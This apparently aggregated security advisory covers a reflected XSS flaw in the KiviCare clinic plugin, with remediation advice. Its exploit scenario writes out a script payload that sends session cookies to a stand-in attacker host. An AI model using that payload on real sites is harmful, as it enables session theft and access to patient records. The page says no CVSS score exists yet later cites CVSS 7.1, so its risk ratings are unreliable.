Exploitation Conditions

Remote unauthenticated attacker crafts malicious URL containing XSS payload targeting KiviCare clinic management system versions ≤3.6.16. Victim must click the link or visit the attacker-controlled URL in their browser. No special configuration required; affects default installations.

Impact

Without a CVSS vector, explicit EPSS score, or KEV listing, direct quantitative risk assessment is limited; however, Reflected XSS is inherently high-risk due to its broad attack surface and ease of exploitation. The attack requires minimal complexity—typically just crafting a URL—and no authentication, meaning any unauthenticated user visiting a malicious link is vulnerable. The practical impact is significant: attackers can steal session cookies, perform unauthorized administrative actions in the clinic system, or harvest sensitive patient data. The lack of a published CVSS score and EPSS metric, combined with public disclosure via Patchstack, suggests this is a real vulnerability with moderate-to-high exploitation potential rather than a theoretical or low-impact issue. Organizations running KiviCare 3.6.16 or earlier should treat this as a near-term remediation priority.

Exploit ScenarioDerived

An attacker crafts a phishing email containing a malicious link such as https://clinic.example.com/kivicare/?search=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>, and sends it to clinic staff. When a logged-in staff member clicks the link, the unvalidated input is reflected in the search results page, executing the injected JavaScript in their browser, which silently exfiltrates their session cookie to the attacker's server. The attacker then uses the stolen session to impersonate the staff member and access, modify, or exfiltrate patient records.

AnalysisAIv1 – Mar 25, 2026

A Reflected Cross-Site Scripting (XSS) vulnerability exists in Iqonic Design's KiviCare clinic management system through version 3.6.16, allowing attackers to inject malicious scripts into web pages viewed by users. An attacker can craft a malicious URL containing JavaScript payload and trick users into clicking it, enabling session hijacking, credential theft, or unauthorized actions within the clinic management system. No CVSS score, EPSS probability, or KEV status are available, though the vulnerability was publicly disclosed by Patchstack and is categorized under CWE-79 (Improper Neutralization of Input During Web Page Generation).

RemediationAI

Immediately upgrade KiviCare to a version newer than 3.6.16 once available from Iqonic Design, or contact the vendor at https://patchstack.com/ for patch availability and timeline information. Until an official patch is released, implement defense-in-depth controls: enforce strict Content Security Policy (CSP) headers to prevent inline script execution, enable HTTP-only and Secure flags on session cookies, and deploy a Web Application Firewall (WAF) with rules to detect and block XSS payloads in query parameters and form inputs. Additionally, restrict administrative access to KiviCare installations to trusted IP ranges and educate users not to click on untrusted links referencing the clinic management system.

Technical ContextAI · show details

The vulnerability is a Reflected XSS flaw classified under CWE-79, which occurs when user-supplied input is improperly sanitized before being rendered in HTML responses. KiviCare, identified via CPE cpe:2.3:a:iqonic_design:kivicare:*:*:*:*:*:*:*:*, is a WordPress-based clinic management plugin that fails to adequately neutralize malicious input parameters during web page generation. This allows attackers to bypass input validation and output encoding mechanisms, enabling arbitrary JavaScript execution in the victim's browser within the context of the vulnerable application's origin.

Executive ViewAI

Why It Matters

CVE-2026-25383 presents moderate security risk, a cross-site scripting vulnerability rated CVSS 7.1. Attackers could inject malicious scripts to steal user sessions, credentials, or perform actions on behalf of authenticated users. Organizations should apply vendor updates when available and consider compensating controls in the interim.

Business Impact: Moderate
Compensating Controls

Apply vendor patch. If immediate patching is not feasible: (1) Implement Content-Security-Policy headers; (2) Enable HttpOnly and SameSite cookie attributes; (3) Deploy WAF XSS/CSRF rules.
